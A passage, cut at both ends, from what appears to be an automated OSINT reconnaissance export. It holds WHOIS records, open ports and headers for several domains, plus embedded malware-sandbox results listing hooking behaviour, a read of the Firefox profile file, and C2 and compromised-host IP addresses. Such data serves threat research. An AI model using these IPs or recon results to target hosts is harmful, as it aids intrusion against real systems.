"SCODEF:3864 CREDAT:275457 /prefetch:2" (UID: 00000000-00002776)'}, {u'category': u'Unusual Characteristics', u'origin': u'Registry Access', u'identifier': u'registry-26', u'name': u'Reads the windows installation language', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 5, u'threat_level': 0, u'type': 3, u'description': u'"IEXPLORE.EXE" (Path: "HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE"; Key: "INSTALLLANGUAGEFALLBACK")'}, {u'category': u'Unusual Characteristics', u'origin': u'Hook 
Detection', u'identifier': u'hooks-8', u'name': u'Installs hooks/patches the running process', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1179', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1179', u'relevance': 10, u'threat_level': 0, u'type': 11, u'description': u'"iexplore.exe" wrote bytes "5069d1f3fe070000" to virtual address "0xF4E040E0" (part of module "IEFRAME.DLL")\n "iexplore.exe" wrote bytes "b062d1f3fe070000" to virtual address "0xFF02BE80" (part of module "OLE32.DLL")\n "iexplore.exe" wrote bytes "401ccdf3fe070000" to virtual address "0xFBDB6098" (part of module "VERSION.DLL")\n "iexplore.exe" wrote bytes "5007cff3fe070000" to virtual address "0xFDD41ED8" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "d060d1f3fe070000" to virtual address "0xFB4F1CC0" (part of module "COMCTL32.DLL")\n "iexplore.exe" wrote bytes "401ccdf3fe070000" to virtual address "0xFE716FA0" (part of module "ADVAPI32.DLL")\n "iexplore.exe" wrote bytes "401ccdf3fe070000" to virtual address "0xFD273330" (part of module "IERTUTIL.DLL")\n "iexplore.exe" wrote bytes "401ccdf3fe070000" to virtual address "0xF4E02D78" (part of module "IEFRAME.DLL")\n "iexplore.exe" wrote bytes "401ccdf3fe070000" to virtual address "0xFD8D2390" (part of module "GDI32.DLL")\n "iexplore.exe" wrote bytes "b062d1f3fe070000" to virtual address "0xFEE755B8" (part of modu 104.21.28.240 2022-12-18 00:13:51 Internet Name No DNS Brute-forcer 0 0 1 0 None www.zerotwo-best-waifu.online zerotwo-best-waifu.online 2022-12-18 00:59:52 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: misogyny.org Registry Domain ID: 306b87640a9a4177b66ed5ee2d15d5eb-LROR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-12-01T05:06:01Z Creation Date: 2000-01-03T07:35:22Z Registry Expiry Date: 2024-01-03T07:35:22Z Registrar: NameCheap, Inc. 
Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns1.dan.com Name Server: ns2.dan.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:59:51Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. 
Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Domain name: misogyny.org Registry Domain ID: 306b87640a9a4177b66ed5ee2d15d5eb-LROR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-11-26T05:05:02.00Z Creation Date: 2000-01-03T07:35:22.43Z Registrar Registration Expiration Date: 2024-01-03T07:35:22.00Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: transferPeriod https://icann.org/epp#transferPeriod Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 
Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 41c364fb5187478eb52fa456269b7aef.protect@withheldforprivacy.com Name Server: ns1.dan.com Name Server: ns2.dan.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T21:59:51.97Z <<< For more information on Whois status codes, please visit https://icann.org/epp misogyny.org 2022-12-18 00:18:15 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.5:8443 188.114.97.0/24 2022-12-18 00:06:15 Linked URL - Internal No Web Spider 0 0 1 0 None http://misogyny.wtf/ misogyny.wtf 2022-12-18 00:03:10 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.236 81.88.52.232 2022-12-18 00:21:30 Physical Location No Censys 0 0 2 0 None United States, North America 172.67.190.129 2022-12-18 00:24:56 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.179 90.116.149.183 2022-12-18 00:09:02 Open TCP Port No LeakIX 0 0 2 0 None 188.114.97.1:443 188.114.97.1 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None TEO Network Enterprise (Net ID: 00:01:24:F0:B7:E1) 37.780462,-122.390564 2022-12-18 00:13:40 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.128:8080 188.114.96.0/24 2022-12-18 00:06:31 Company Name No Company Name Extractor 0 0 2 0 None NameCheap, Inc. Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. 
Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. 
Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. 
Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ 
>>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77aa7502b9001b65-ORD 188.114.97.1 2022-12-18 00:26:49 Affiliate - Domain Whois No Whois 5 0 6 0 None Domain Name: dominiando.us Registry Domain ID: D19621490-US Registrar WHOIS Server: Registrar URL: https://key-systems.net Updated Date: 2022-06-06T00:00:06Z Creation Date: 2009-04-22T11:21:03Z Registry Expiry Date: 2023-04-21T23:59:59Z Registrar: Key-Systems GmbH Registrar IANA ID: 269 Registrar Abuse Contact Email: abuse@key-systems.net Registrar Abuse Contact Phone: +49.6894939685 Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: C19621489-US Registrant Name: Francesco Pacaccio Registrant Organization: Dominiando Srl Registrant Street: Piazzale Clodio 8 Registrant Street: Registrant Street: Registrant City: Roma Registrant State/Province: Registrant Postal Code: 00195 Registrant Country: IT Registrant Phone: +39.068072248 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: domini@dominiando.it Registrant Application Purpose: P1 Registrant Nexus Category: C31/IT Registry Admin ID: C19621489-US Admin Name: Francesco Pacaccio Admin Organization: Dominiando Srl Admin Street: Piazzale Clodio 8 Admin Street: Admin Street: Admin City: Roma Admin State/Province: Admin Postal Code: 00195 Admin Country: IT Admin Phone: +39.068072248 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: domini@dominiando.it Admin Application Purpose: P1 Admin Nexus Category: C31/IT Registry Tech ID: C2262438-US Tech Name: Domain Management Tech Organization: Dominiando Srl Tech Street: Piazzale Clodio 8 Tech Street: Tech Street: Tech City: Rome Tech State/Province: IT Tech Postal Code: 00195 Tech Country: IT Tech Phone: 
+39.0680693248 Tech Phone Ext: Tech Fax: +39.06233200178 Tech Fax Ext: Tech Email: domini@dominiando.it Tech Application Purpose: P1 Tech Nexus Category: C31/IT Name Server: ns.dominiando.it Name Server: ns.dominiando.asia Name Server: ns.dominiando.uk Name Server: ns.dominiando.us DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:26:49Z <<< For more information on Whois status codes, please visit https://icann.org/epp .US WHOIS Complaint Tool - http://www.whoiscomplaints.us Advanced WHOIS Instructions - http://whois.us/help.html Registry Services, LLC, the Registry Administrator for .US, has collected this information for the WHOIS database through a .US-Accredited Registrar. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the registry database. Registry Services, LLC makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without our prior written permission. We reserve the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms. 
NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.whois.us. dominiando.us 2022-12-18 00:14:32 Country No Country Name Extractor 0 1 3 0 None Iceland +3544212434 2022-12-18 00:04:28 Email Gateway (DNS MX Records) No DNS Raw Records 0 0 1 0 None eforward4.registrar-servers.com misogyny.wtf 2022-12-18 00:21:06 Open TCP Port No Censys 0 0 2 0 None 172.67.147.230:2083 172.67.147.230 2022-12-18 00:13:46 Affiliate - Email Address No E-Mail Address Extractor 0 0 4 0 None 6eadd514503047339410d1e131d27118.protect@withheldforprivacy.com Domain Name: REGISTRAR-SERVERS.COM Registry Domain ID: 1326800137_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2021-10-25T10:49:38Z Creation Date: 2007-11-08T15:04:30Z Registry Expiry Date: 2023-11-08T15:04:30Z Registrar: NameCheap, Inc. 
Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited Name Server: EDNS1.REGISTRAR-SERVERS.COM Name Server: EDNS2.REGISTRAR-SERVERS.COM Name Server: EDNS4.ULTRADNS.COM Name Server: EDNS4.ULTRADNS.NET Name Server: EDNS4.ULTRADNS.ORG DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:42Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. 
By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. 
Domain name: registrar-servers.com Registry Domain ID: 1326800137_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2021-10-23T04:15:22.00Z Creation Date: 2007-11-08T15:04:30.00Z Registrar Registration Expiration Date: 2023-11-08T15:04:30.00Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: transferPeriod https://icann.org/epp#transferPeriod Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 6eadd514503047339410d1e131d27118.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 6eadd514503047339410d1e131d27118.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 6eadd514503047339410d1e131d27118.protect@withheldforprivacy.com Name Server: edns4.ultradns.net Name Server: edns4.ultradns.com Name Server: edns4.ultradns.org Name Server: 
edns1.registrar-servers.com Name Server: edns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T19:58:34.95Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:04:28 Name Server (DNS NS Records) No DNS Raw Records 0 0 1 0 None ns2.amenworld.com zerotwo-best-waifu.online 2022-12-18 00:21:06 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.147.230 2022-12-18 00:19:22 Raw Data from RIRs No Hybrid Analysis 0 0 3 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 4, u'threat_score': 81, u'compromised_hosts': [u'69.204.153.221', u'77.121.186.224', u'93.77.224.224', u'73.183.11.231', u'5.105.56.87', u'212.193.48.220'], u'environment_id': 4, u'major_os_version': None, u'submit_name': u'50f64a2f38a4de55e92654aaa72079e2', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"smtp.ltk.lv"\n "dcc.state.ar.us"\n "fmx.freemail.hu"\n "smtp.fsmail.net"\n "mitre.org"\n "yahoo.gr"\n "mx1.stratanet.com"\n "smtp1.wilsonsd.org"\n "mail.triton.net"\n "bankislam.com.my"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 
0, u'type': 7, u'description': u'"69.204.153.221:80"\n "77.121.186.224:80"\n "93.77.224.224:80"\n "89.136.111.229:80"\n "73.183.11.231:80"\n "74.77.23.40:80"\n "178.137.117.54:80"\n "91.218.90.63:80"\n "5.105.56.87:80"\n "134.255.30.107:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-2', u'name': u'GETs files from a webserver', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET /file.htm HTTP/1.1\nHost: 5.105.56.87\nContent-Length: 164\nUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0"\n "GET /login.htm HTTP/1.1\nHost: 5.105.56.87\nContent-Length: 1857\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"\n "GET /index.htm HTTP/1.1\nHost: 210.56.179.110\nContent-Length: 164"\n "GET /welcome.htm HTTP/1.1\nHost: 210.56.179.110\nContent-Length: 531\nUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0"'}, {u'category': u'Environment Awareness', u'origin': u'StaticStream (Disassembly)', u'identifier': u'stream-2', u'name': u'Contains ability to query machine time', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 1, u'description': u'GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-52256-1290-00515857\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-52256-1065-004517D8\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-52256-148-0042112B\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-52256-141-00506757\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-47776-148-0042112B\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-47776-141-00506757\n GetSystemTimeAsFileTime@KERNEL32.DLL at 00011898-00002812-47776-1065-004517D8\n GetSystemTimeAsFileTime@KERNEL32.DLL at 
00011898-00002812-47776-1290-00515857'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-6', u'name': u'Reads configuration files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 4, u'threat_level': 1, u'type': 6, u'description': u'".exe" read file "C:\\Users\\PSPUBWS\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 156.154.70.22" with description "Payload with 27 bytes: 000401000001000000000000057961686F6F03636F6D00000F0001"\n "UDP connection to 208.67.220.220" with description "Payload with 27 bytes: 000501000001000000000000057961686F6F03636F6D00000F0001"\n "UDP connection to 156.154.71.1" with description "Payload with 27 bytes: 000601000001000000000000057961686F6F03636F6D00000F0001"\n "UDP connection to 156.154.70.1" with description "Payload with 27 bytes: 000A01000001000000000000057961686F6F03636F6D00000F0001"\n "UDP connection to 198.153.194.1" with description "Payload with 27 bytes: 001001000001000000000000057961686F6F03636F6D00000F0001"\n "UDP connection to 4.2.2.1" with description "Payload with 27 bytes: 001A0100000100000000000005676D61696C03636F6D00000F0001"'}, {u'category': u'Unusual Characteristics', u'origin': u'Hooks', u'identifier': u'hooks-8', u'name': u'Installs hooks/patches the running process', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 11, u'description': u'".exe" wrote bytes 
